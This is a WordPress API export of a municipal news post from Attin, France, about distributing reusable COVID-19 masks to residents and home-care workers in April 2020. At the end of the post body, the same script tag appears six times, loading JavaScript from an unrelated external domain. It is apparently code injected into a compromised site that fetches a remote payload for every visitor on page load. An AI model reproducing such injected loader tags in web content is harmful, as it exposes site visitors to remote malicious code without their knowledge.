{"id":2500,"date":"2020-04-24T15:02:50","date_gmt":"2020-04-24T14:02:50","guid":{"rendered":"http:\/\/www.attin-mairie.fr\/?p=2500"},"modified":"2020-04-24T22:05:36","modified_gmt":"2020-04-24T21:05:36","slug":"mobilisation-pour-les-masques","status":"publish","type":"post","link":"https:\/\/www.attin-mairie.fr\/?p=2500","title":{"rendered":"Mobilisation pour les masques"},"content":{"rendered":"<p>La commune d&rsquo;Attin a r\u00e9pondu \u00e0 l&rsquo;appel de la r\u00e9gion des Hauts de France, afin que chaque habitant de chaque commune puisse disposer d&rsquo;un masque chacun au d\u00e9but du d\u00e9confinement, programm\u00e9 au 11 mai prochain. Les modalit\u00e9s de distribution de ces masques r\u00e9utilisables seront d\u00e9finies tr\u00e8s prochainement, d\u00e8s lors qu&rsquo;ils seront disponibles.<\/p>\n<p>De son c\u00f4t\u00e9, la CA2BM a pris l&rsquo;initiative d&rsquo;acqu\u00e9rir 3 000 masques en tissu labellis\u00e9s par le CHU de Lille, mais \u00e0 destination uniquement des personnels soignants et intervenants \u00e0 domicile hors structures, tels que&nbsp;m\u00e9decins, infirmiers, aides-soignants, auxiliaires de vie, etc\u2026 qui ne d\u00e9pendent pas d\u2019un \u00e9tablissement hospitalier, d\u2019un EPHAD ou d\u2019une association ( ex ADMR, ASSAD et autres organismes d\u2019aide \u00e0 la personne). Ces masques sont financ\u00e9s par les indemnit\u00e9s des \u00e9lus du Bureau Communautaire sur proposition du Pr\u00e9sident. Une premi\u00e8re distribution a commenc\u00e9 jeudi 23 avril dans les mairies de Berck, Etaples, Montreuil et Le Touquet. Elle se poursuivra lundi 27 avril aux m\u00eames lieux, de 10h \u00e0 12h et de 14h \u00e0 16h, \u00e0 raison de deux masques par personne.<\/p>\n<p><a href=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/04\/masques.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"size-medium wp-image-2501 aligncenter\" src=\"http:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/04\/masques-300x173.jpg\" alt=\"\" width=\"300\" height=\"173\" srcset=\"https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/04\/masques-300x173.jpg 300w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/04\/masques-768x442.jpg 768w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/04\/masques-1024x589.jpg 1024w, https:\/\/www.attin-mairie.fr\/wp-content\/uploads\/2020\/04\/masques.jpg 1200w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n<p><script src=\"\/\/jaretsummer.com\/228ebbb479fb2ce2f7.js\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>La commune d&rsquo;Attin a r\u00e9pondu \u00e0 l&rsquo;appel de la r\u00e9gion des Hauts de France, afin que chaque habitant de chaque commune puisse disposer d&rsquo;un masque chacun au d\u00e9but du d\u00e9confinement, programm\u00e9 au 11 mai prochain. Les modalit\u00e9s de distribution de ces masques r\u00e9utilisables seront d\u00e9finies tr\u00e8s prochainement, d\u00e8s lors qu&rsquo;ils seront disponibles. De son c\u00f4t\u00e9, [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":2501,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ngg_post_thumbnail":0,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-2500","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2500","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2500"}],"version-history":[{"count":6,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2500\/revisions"}],"predecessor-version":[{"id":2507,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/posts\/2500\/revisions\/2507"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=\/wp\/v2\/media\/2501"}],"wp:attachment":[{"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2500"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2500"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.attin-mairie.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2500"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}